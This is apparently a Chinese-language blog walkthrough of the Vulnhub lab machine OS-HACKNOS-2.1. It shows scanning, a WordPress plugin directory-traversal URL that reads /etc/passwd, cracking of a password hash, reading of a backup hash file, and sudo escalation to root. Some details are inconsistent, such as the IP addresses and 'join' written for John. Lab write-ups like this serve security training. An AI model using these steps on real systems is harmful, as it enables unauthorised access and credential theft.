Vulnhub靶机:OS-HACKNOS-2.1

kali IP:192.168.1.190

Target IP: 192.168.1.185

靶机下载:https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/

靶机目标:普通用户的user.txt与root用户的root.txt

 

1.打开kali虚拟终端:ifconfig ,ip为192.168.1.41

2. 主机发现(以下246跟94属于同一个)

使用nmap扫描:nmap -sP -v 192.168.1.0/24  ,发现192.168.1.94是为目标IP地址

 3.主机信息探测

nmap -sV 192.168.1.94 -O

开放22与80端口

 

4.网站探测

通过浏览器访问80端口发现为Apache安装默认页面

 

 

5.在github中下载目录爆破工具dirsearch

网址:https://github.com/maurosoria/dirsearch

6.使用dirsearch进行目录扫描   ./dirsearch.py -u http://192.168.1.94/

 

发现tsweb目录为WordPress站点...

 

7.Wpscan漏洞扫描网站

wpscan --url http://192.168.1.94/tsweb -e ap

 

8.访问漏洞地址:

https://www.exploit-db.com/exploits/46537

9.拼接地址

http://192.168.1.94/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

 

10.通过查看页面源代码的方式(ctrl+u),得知靶机存在3个用户:root、rohit、flag。注意到flag用户的密码占位符的位置中有$符号,说明是经过md5加密的

 

发现32行:

flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash

11.破解用户密码

使用join破解flag用户的密码,得到密码:topsecret

注:join一旦破解出了密码,再次破解的话就不再显示破解结果,需要通过--show查看破解结果

 

 

12.进行SSH登录...并查找passwd文件中使用bash登录的用户为rohit并进行目录遍历发现该用户密码...

ssh flag@192.168.1.94

 

cat /etc/passwd | grep bash

cat /var/backups/passbkp/md5-hash

 

13.对rohit用户进行解密...并获取密码!%hack41

 

 

14.切换到rohit用户进入家目录发现user.txt发现当前用户具有sudo权限切换并进入到root用户家目录获取root.txt

su rohit登录,密码  !%hack41

 

cd

ls

cat user.txt

sudo su root(密码  !%hack41)

cd

ls

cat root.txt

 

posted @ 2022-02-22 17:35  风潆月  阅读(116)  评论(0编辑  收藏  举报